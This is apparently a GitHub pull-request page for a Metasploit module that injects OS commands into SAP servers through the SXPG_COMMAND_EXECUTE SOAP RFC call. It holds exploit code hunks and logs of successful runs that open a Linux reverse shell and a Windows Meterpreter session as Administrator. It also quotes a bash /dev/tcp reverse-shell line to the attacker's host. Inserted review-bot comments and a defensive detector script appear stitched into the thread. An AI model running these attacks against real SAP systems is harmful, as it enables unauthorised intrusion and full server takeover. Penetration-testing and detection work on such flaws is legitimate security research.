
SAP SOAP Service SXPG_COMMAND_EXEC Function Command Injection #1667

Merged (1 commit)

4 participants

@nmonkee

This module makes use of the SXPG_COMMAND_EXEC Remote Function Call, through the use of the /sap/bc/soap/rfc SOAP service, to inject and execute OS commands.

SAP Note: 1341333 and 1764994.

http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection
https://service.sap.com/sap/support/notes/1764994
https://service.sap.com/sap/support/notes/1341333

@wchen-r7 wchen-r7 commented on an outdated diff
...ts/linux/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb
((18 lines not shown))
+# Dmitry Evdokimov.
+#
+# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis
+# who have Beta tested the modules and provided excellent feedback. Some people
+# just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize
+ super(
+ 'Name' => 'SAP /sap/bc/soap/rfc SOAP Service SXPG_COMMAND_EXEC Function Command Injection',
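Review bot: `def initialize` in this hunk takes no argument and calls `super(` directly; Metasploit modules conventionally declare `def initialize(info = {})` and call `super(update_info(info, ...))` so the framework can merge extra metadata into the module when it is loaded. Suggest replacing the two lines with:
 def initialize(info = {})
 super(update_info(info,
and closing the `update_info(` call where the `super(` argument list ends.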

I feel like this title needs a rename, what do others think?

@todb-r7
todb-r7 added a note

It's long and ugly, but it is descriptive and comports with the existing modules.

@wchen-r7 wchen-r7 commented on an outdated diff
...ts/linux/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb
((98 lines not shown))
+ data << '<n1:SXPG_COMMAND_EXECUTE xmlns:n1="urn:sap-com:document:sap:rfc:functions" env:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">' + "\r\n"
+ data << '<ADDITIONAL_PARAMETERS>' + command + ' </ADDITIONAL_PARAMETERS>' + "\r\n"
+ data << '<COMMANDNAME>DBMCLI</COMMANDNAME>' + "\r\n"
+ data << '<OPERATINGSYSTEM>ANYOS</OPERATINGSYSTEM>' + "\r\n"
+ data << '<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>' + "\r\n"
+ data << '</n1:SXPG_COMMAND_EXECUTE>' + "\r\n"
+ data << '</env:Body>' + "\r\n"
+ data << '</env:Envelope>' + "\r\n"
+ return data
+ end
+
+ def exec_command(ip,data)
+ user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+ print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
+ begin
+ res = send_request_raw(
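Review bot: `exec_command` opens a `begin` block around `send_request_raw(` on the last two lines; the matching `rescue` (not shown in this hunk) should name the exceptions it expects (`::Rex::ConnectionError`, `::Timeout::Error`, `::Errno::EPIPE`) and print the exception's message, otherwise a connection refusal, a timeout and an HTTP-level failure all collapse into one generic error line and cannot be told apart when the module is being debugged. Also, `'<ADDITIONAL_PARAMETERS>' + command + ' </ADDITIONAL_PARAMETERS>'` carries a stray space before the closing tag.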

send_request_cgi() probably works better in this case. Use the "vars_get" option.
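The hunk above shows the shape of the SOAP body the module posts to /sap/bc/soap/rfc: an RFC function element in the `urn:sap-com:document:sap:rfc:functions` namespace carrying `COMMANDNAME`, `ADDITIONAL_PARAMETERS` and `OPERATINGSYSTEM`. As an added example (not code from this pull request or from Metasploit), here is a small Ruby checker a defender could run over captured request bodies from an ICF trace or reverse-proxy log: it parses the envelope, reports any `SXPG_COMMAND_EXECUTE` call as worth reviewing, and rates it high when `ADDITIONAL_PARAMETERS` contains shell metacharacters, which is the parameter-injection pattern the MWR post describes. The sample envelopes, the `DEMO_DB` argument string and the `SHELL_META` character set are constructed assumptions.

```ruby
require 'rexml/document'

SOAP_ENV = 'http://schemas.xmlsoap.org/soap/envelope/'
RFC_NS   = 'urn:sap-com:document:sap:rfc:functions'

# Characters that let an ADDITIONAL_PARAMETERS value escape the intended
# argument list and start a second shell command. Assumed set; tune per platform.
SHELL_META = /[;|&`$<>\n]/

# Minimal XML text escaping so constructed sample values cannot break the markup.
def xml_escape(s)
  s.to_s.gsub('&', '&amp;').gsub('<', '&lt;').gsub('>', '&gt;')
end

# Builds a constructed sample envelope (not captured traffic) in the same shape
# as the module's request: one RFC function element inside the SOAP Body.
def build_envelope(function, fields)
  inner = fields.map { |k, v| "<#{k}>#{xml_escape(v)}</#{k}>" }.join("\n")
  <<~XML
    <env:Envelope xmlns:env="#{SOAP_ENV}">
    <env:Body>
    <n1:#{function} xmlns:n1="#{RFC_NS}">
    #{inner}
    </n1:#{function}>
    </env:Body>
    </env:Envelope>
  XML
end

# Constructed samples. DEMO_DB and the argument strings are placeholders.
SAMPLE_BENIGN = build_envelope('SXPG_COMMAND_EXECUTE',
  'ADDITIONAL_PARAMETERS' => '-d DEMO_DB db_state',
  'COMMANDNAME' => 'DBMCLI', 'OPERATINGSYSTEM' => 'ANYOS')
SAMPLE_INJECTED = build_envelope('SXPG_COMMAND_EXECUTE',
  'ADDITIONAL_PARAMETERS' => '-d DEMO_DB db_state; echo injected', # ';' breaks out
  'COMMANDNAME' => 'DBMCLI', 'OPERATINGSYSTEM' => 'ANYOS')
SAMPLE_SYSINFO = build_envelope('RFC_SYSTEM_INFO', {})

# Returns { function:, params: } for an RFC call in the SAP RFC namespace,
# or nil when the document is not one (or is not well-formed XML).
def parse_rfc_call(xml)
  doc  = REXML::Document.new(xml)
  body = REXML::XPath.first(doc, '/env:Envelope/env:Body', 'env' => SOAP_ENV)
  return nil unless body
  call = body.elements.to_a.first
  return nil unless call && call.namespace == RFC_NS
  params = {}
  call.elements.each { |e| params[e.name] = e.text.to_s.strip }
  { function: call.name, params: params }
rescue REXML::ParseException
  nil
end

# Rates one request body: :info for anything that is not an external command
# call, :medium for any SXPG_COMMAND_EXECUTE over the SOAP RFC service, :high
# when the extra parameters carry shell metacharacters.
def assess_rfc_call(xml)
  call = parse_rfc_call(xml)
  return { severity: :info, reason: 'not a SAP RFC SOAP call' } unless call
  unless call[:function] == 'SXPG_COMMAND_EXECUTE'
    return { severity: :info, reason: "RFC function #{call[:function]}" }
  end
  command = call[:params]['COMMANDNAME']
  extra   = call[:params]['ADDITIONAL_PARAMETERS'].to_s
  if extra =~ SHELL_META
    { severity: :high, command: command, extra: extra,
      reason: "external command #{command} called with shell metacharacters in ADDITIONAL_PARAMETERS" }
  else
    { severity: :medium, command: command, extra: extra,
      reason: "external command #{command} invoked via SXPG_COMMAND_EXECUTE over the SOAP RFC service" }
  end
end

if __FILE__ == $0
  [SAMPLE_BENIGN, SAMPLE_INJECTED, SAMPLE_SYSINFO].each do |xml|
    r = assess_rfc_call(xml)
    puts "#{r[:severity].to_s.upcase}: #{r[:reason]}"
  end
end
```

Running the file prints one line per sample; in a real deployment the same `assess_rfc_call` would be fed the decoded body of each POST to /sap/bc/soap/rfc, and anything rated medium or high should be correlated with the SM49/SM69 external-command definitions and with who holds authorization to call SXPG_COMMAND_EXECUTE remotely.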

@wchen-r7 wchen-r7 commented on an outdated diff
...ts/linux/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb
((104 lines not shown))
+ data << '</env:Body>' + "\r\n"
+ data << '</env:Envelope>' + "\r\n"
+ return data
+ end
+
+ def exec_command(ip,data)
+ user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+ print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
+ begin
+ res = send_request_raw(
+ {
+ 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' => {
+ 'Content-Length' => data.size.to_s,
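Review bot: `'Content-Length' => data.size.to_s` on the last line uses `String#size`, which counts characters rather than bytes; if `data` ever contains non-ASCII text the declared length disagrees with the body actually sent. Use `data.bytesize.to_s`, or drop the header and let the HTTP client compute it. The query string assembled inline in `'uri'` (`'/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN'`) would also be more robust as a `'vars_get'` hash so the values are URL-encoded rather than concatenated raw.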

If you use send_request_cgi(), you don't need to set the content-length header, it's done automatically.

@wchen-r7 wchen-r7 commented on an outdated diff
...ts/linux/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb
((107 lines not shown))
+ end
+
+ def exec_command(ip,data)
+ user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+ print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
+ begin
+ res = send_request_raw(
+ {
+ 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' => {
+ 'Content-Length' => data.size.to_s,
+ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,
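Review bot: the client and language are hard-coded in two places in this hunk, the `'uri'` query string and the `'Cookie'` value `'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT']`; pull `datastore['CLIENT']` and the language into locals at the top of `exec_command` so the two cannot drift apart when one is edited. The hand-built `'Authorization' => 'Basic ' + user_pass` header duplicates what the HTTP mixin's basic-auth support already does; if it stays manual, the credential string should not be recomputed on every call next to the `print_status` line.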

Again, if you use send_request_cgi(), you can use the "basic_auth" option instead of setting the Authorization header manually.

@todb-r7
todb-r7 added a note

If I could get clear and concise documentation that made it obvious what the correct template/standard was it would be easier to contribute.

I understand your frustration. Part of the inconsistencies you're seeing is the continuous level of sophistication that we build up as reviewers, though. Barring some kind of head injury, we're all getting smarter about how to review the modules contributors like you are writing. Module writing and reviewing are both pretty subjective -- otherwise you end up with too rigid a framework to do anything useful in. Please don't take the suggestions the wrong way.

@wchen-r7 is ultimately not just bikeshedding here, but suggesting a more appropriate alternative method that is clearly non-obvious. And I agree, it's non-obvious -- the documentation on send_request_raw() and send_request_cgi() in http/client.rb is identical for both methods, so there's no real clue that one is better than the other.

So, documentation-wise, that's clearly a failure on our part. We are working on better in-code documentation and better ways to come up with templates for common patterns, though, so please be patient. We've committed to using YARD as a documentation engine, so hopefully things get better soon there.

In the meantime -- Looking back over your commit history in particular, I see that you've used send_request_raw() a lot. All of @nmonkee's past modules live here and are sap_soap_rfc_*.rb . So, to offer a suggestion back -- it might have been more constructive on your part to offer one of these as a counter-example for @wchen-r7 to consider?

Thanks for the efforts, and thanks for bringing up the frustration. I try to be sensitive to that and if you have other suggestions on how we can more quickly improve the review process, please don't hold back.

@nmonkee
nmonkee added a note

I don't want to go to war over it. I don't get a lot of time to knock out these modules, so I grab the opportunity when I get the chance. If you can let me know what you need me to do to have this module and the others accepted, in a clear and concise manner, that would be awesome. As I said, not a lot of time, so I'd really like to avoid having to keep re-setting up my lab to test each change etc. I'm receptive to advice on alternatives, but providing rationale would help the process. It's a learning process for myself also. Consistency is key. I accept it's not easy to obtain.

I would like to help here :)

I just would like to ask if there is a free trial of SAP Application Server for Linux? I only see the Free Trial for Windows.

@nmonkee Do you mind sharing the link to the trial for Linux, if it's available and you've located it?

Thanks in advance,

juan

btw, is it related to #1679? If both modules are exploiting the same vulnerability it should be coded just as one "multiplatform" exploit. You can check the exploits in the multi "folder" to get comfortable with how to deal with it. Again, I can help with this in order to save you time and headaches :-) First of all, clarifying these first doubts and playing a little with them in the meanwhile.

I see. If it's the same vulnerability, even if you're using a different technique for Linux (CMD payload vs staging, you mean??) I guess we'll need to merge them. But we can work on it later. At the moment, since I've a Windows SAP trial, we can start with #1679. I switch to this pull request first of all :)

@jvazquez-r7

New test after check:

  • Transaction SICF and check /sap/bc/soap/rfc is enabled
  • Restart SIAC_PUBLISH_ALL_INTERNAL transaction
  • Restart NSP
  • Restart the full machine and SAP, alright

Still not working:


msf exploit(sap_soap_rfc_dbmcli_sxpg_command_exec) > show options

Module options (exploit/linux/sap/sap_soap_rfc_dbmcli_sxpg_command_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT    001              yes       SAP Client
   OS        linux            yes       Target OS (accepted: linux)
   PASSWORD  06071992         yes       Password
   Proxies                    no        Use a proxy chain
   RHOST     192.168.172.179  yes       The target address
   RPORT     8042             yes       The target port
   USERNAME  SAP*             yes       Username
   VHOST                      no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.172.1    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   SAP AS on Linux


msf exploit(sap_soap_rfc_dbmcli_sxpg_command_exec) > rexploit
[*] Reloading module...

[*] [SAP] 192.168.172.179:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] Started reverse double handler
[-] [SAP] 192.168.172.179:8042 - something went wrong!
[*] [SAP] 192.168.172.179:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[-] [SAP] 192.168.172.179:8042 - something went wrong!

btw @nmonkee I can't contact you via email anymore, I get a quota exceeded error.

@jvazquez-r7

As you asked via email, I'm attaching info from the sap_icf_public_info module:

msf auxiliary(sap_icf_public_info) > run

[*] [SAP] 192.168.172.179:8042 - Sending request to SAP Application Server
[*] [SAP] 192.168.172.179:8042 - Response received

[SAP] ICF SAP PUBLIC INFO
=========================

   Key                                    Value
   ---                                    -----
   Central Database System:               ADABAS D
   Character Set:                         4103
   Database Host:                         NPLHOST
   Float Type Format:                     IEEE
   Hostname:                              nplhost
   IPv4 Address:                          192.168.234.42
   IPv6 Address:                          192.168.234.42
   Integer Format:                        Little Endian
   Kernel Release:                        720
   Machine ID:                            390
   Operating System:                      Linux
   RFC Destination:                       nplhost_NPL_42
   RFC Log Version:                       011
   Release Status of SAP System:          702
   System ID:                             NPL
   Timezone (diff from UTC in seconds):   0

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Info from sap_mgmt_con_getprocesslist

msf auxiliary(sap_mgmt_con_getprocesslist) > run

[*] 192.168.172.179:50013 [SAP] Connecting to SAP Management Console SOAP Interface 
[+] 192.168.172.179:50013 [SAP] 2 processes listed

[SAP] Process List
==================

   Name        Description    Status   StartTime            ElapsedTime
   ----        -----------    ------   ---------            -----------
   enserver    EnqueueServer  Running  2013 03 06 21:06:11  0:07:19
   msg_server  MessageServer  Running  2013 03 06 21:06:11  0:07:19

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Any of the "sap_soap_rfc*" modules gives me a similar error:

msf auxiliary(sap_soap_rfc_system_info) > run

[*] [SAP] 192.168.172.179:8042 - sending SOAP RFC_SYSTEM_INFO request
[-] [SAP] 192.168.172.179:8042 - something went wrong!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@jvazquez-r7

Hi @nmonkee, this pull request is being cleaned up at nmonkee#10. Plus, this PR also tries to integrate #1679, which makes sense to me, since they are abusing the same function, even when using different techniques for exploitation :)

Feel free to check, verify, test, ask, provide feedback etc. Once you feel comfortable, merge this pull request; the original one will be automatically updated and we'll be ready to merge, I guess :)

  • Test on Linux

VERY IMPORTANT NOTE: ON THE LINUX TESTDRIVE PLATFORM only the perl and ruby CMD payloads have been verified to work. Because of a limitation in the multi-platform exploits, I don't find any way to restrict the allowed payloads from the metadata! So payloads other than the perl and ruby ones are not expected to work on the testdrive platform.

msf exploit(sap_soap_rfc_sxpg_command_exec) > show options

Module options (exploit/multi/sap/sap_soap_rfc_sxpg_command_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT    001              yes       SAP Client
   PASSWORD  06071992         yes       Password
   Proxies                    no        Use a proxy chain
   RHOST     192.168.172.179  yes       The target address
   RPORT     8042             yes       The target port
   USERNAME  SAP*             yes       Username
   VHOST                      no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.172.1    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux


msf exploit(sap_soap_rfc_sxpg_command_exec) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.179:8042 - Dumping the payload to /tmp/nbe49...
[+] 192.168.172.179:8042 - Payload dump was successful
[*] 192.168.172.179:8042 - Executing /tmp/nbe49...
[*] Command shell session 1 opened (192.168.172.1:4444 -> 192.168.172.179:53091) at 2013-05-07 22:32:18 -0500
id

uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)
uname -a
Linux linux-gateway 2.6.32.43-0.4-default #1 SMP 2011-07-14 14:47:44 +0200 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 1? [y/N]  y

  • Test on Windows
msf exploit(sap_soap_rfc_sxpg_command_exec) > show options

Module options (exploit/multi/sap/sap_soap_rfc_sxpg_command_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT    001              yes       SAP Client
   PASSWORD  06071992         yes       Password
   Proxies                    no        Use a proxy chain
   RHOST     192.168.172.185  yes       The target address
   RPORT     8000             yes       The target port
   USERNAME  SAP*             yes       Username
   VHOST                      no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.172.1    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows x64

msf exploit(sap_soap_rfc_sxpg_command_exec) > check
[*] The target service is running, but could not be validated.
msf exploit(sap_soap_rfc_sxpg_command_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.185:8000 - Sending SOAP SXPG_COMMAND_EXECUTE request
[*] Command Stager progress -   2.19% done (249/11366 bytes)
[*] Command Stager progress -   4.38% done (498/11366 bytes)
[*] Command Stager progress -   6.57% done (747/11366 bytes)
[*] Command Stager progress -   8.76% done (996/11366 bytes)
[*] Command Stager progress -  10.95% done (1245/11366 bytes)
[*] Command Stager progress -  13.14% done (1494/11366 bytes)
[*] Command Stager progress -  15.34% done (1743/11366 bytes)
[*] Command Stager progress -  17.53% done (1992/11366 bytes)
[*] Command Stager progress -  19.72% done (2241/11366 bytes)
[*] Command Stager progress -  21.91% done (2490/11366 bytes)
[*] Command Stager progress -  24.10% done (2739/11366 bytes)
[*] Command Stager progress -  26.29% done (2988/11366 bytes)
[*] Command Stager progress -  28.48% done (3237/11366 bytes)
[*] Command Stager progress -  30.67% done (3486/11366 bytes)
[*] Command Stager progress -  32.86% done (3735/11366 bytes)
[*] Command Stager progress -  35.05% done (3984/11366 bytes)
[*] Command Stager progress -  37.24% done (4233/11366 bytes)
[*] Command Stager progress -  39.43% done (4482/11366 bytes)
[*] Command Stager progress -  41.62% done (4731/11366 bytes)
[*] Command Stager progress -  43.81% done (4980/11366 bytes)
[*] Command Stager progress -  46.01% done (5229/11366 bytes)
[*] Command Stager progress -  48.20% done (5478/11366 bytes)
[*] Command Stager progress -  50.39% done (5727/11366 bytes)
[*] Command Stager progress -  52.58% done (5976/11366 bytes)
[*] Command Stager progress -  54.77% done (6225/11366 bytes)
[*] Command Stager progress -  56.96% done (6474/11366 bytes)
[*] Command Stager progress -  59.15% done (6723/11366 bytes)
[*] Command Stager progress -  61.34% done (6972/11366 bytes)
[*] Command Stager progress -  63.53% done (7221/11366 bytes)
[*] Command Stager progress -  65.72% done (7470/11366 bytes)
[*] Command Stager progress -  67.91% done (7719/11366 bytes)
[*] Command Stager progress -  70.10% done (7968/11366 bytes)
[*] Command Stager progress -  72.29% done (8217/11366 bytes)
[*] Command Stager progress -  74.49% done (8466/11366 bytes)
[*] Command Stager progress -  76.68% done (8715/11366 bytes)
[*] Command Stager progress -  78.87% done (8964/11366 bytes)
[*] Command Stager progress -  80.85% done (9189/11366 bytes)
[*] Command Stager progress -  82.76% done (9407/11366 bytes)
[*] Command Stager progress -  84.94% done (9654/11366 bytes)
[*] Command Stager progress -  86.67% done (9851/11366 bytes)
[*] Command Stager progress -  88.50% done (10059/11366 bytes)
[*] Command Stager progress -  90.63% done (10301/11366 bytes)
[*] Command Stager progress -  92.66% done (10532/11366 bytes)
[*] Command Stager progress -  94.67% done (10760/11366 bytes)
[*] Command Stager progress -  95.94% done (10904/11366 bytes)
[*] Command Stager progress -  98.06% done (11146/11366 bytes)
[*] Sending stage (951296 bytes) to 192.168.172.185
[*] Command Stager progress - 100.00% done (11366/11366 bytes)
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.185:57553) at 2013-05-07 22:39:28 -0500

meterpreter > getuid
Server username: GATEWAY\Administrator
meterpreter > sysinfo
Computer        : GATEWAY
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.185 - Meterpreter session 2 closed.  Reason: User exit

@nmonkee nmonkee Merge pull request #10 from jvazquez-r7/sap_soap_rfc_sxpg_command_exec_multi

sap_soap_rfc_sxpg_command_exec multi platform and clean up
2d5556f
@nmonkee

I think I probably modified the payload and uncommented :

# same thing, no semicolons
#return "/bin/bash #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} <&#{fd} >&#{fd}"

I'll have a play.

@jvazquez-r7

Merging in the meanwhile since it's working, with limitation on the payloads available, but works....

@jvazquez-r7 jvazquez-r7 pushed a commit that referenced this pull request
jvazquez-r7 Land #1667, @nmonkee's sap_soap_rfc_sxpg_command_exec exploit 4147a27
@jvazquez-r7 jvazquez-r7 merged commit 2d5556f into rapid7:master

1 check passed: The Travis CI build passed
@nmonkee nmonkee deleted the nmonkee:sap_soap_rfc_dbmcli_sxpg_command_exec_exploit branch
Commits on May 9, 2013
  1. @nmonkee nmonkee committed: Merge pull request #10 from jvazquez-r7/sap_soap_rfc_sxpg_command_exec_multi
     sap_soap_rfc_sxpg_command_exec multi platform and clean up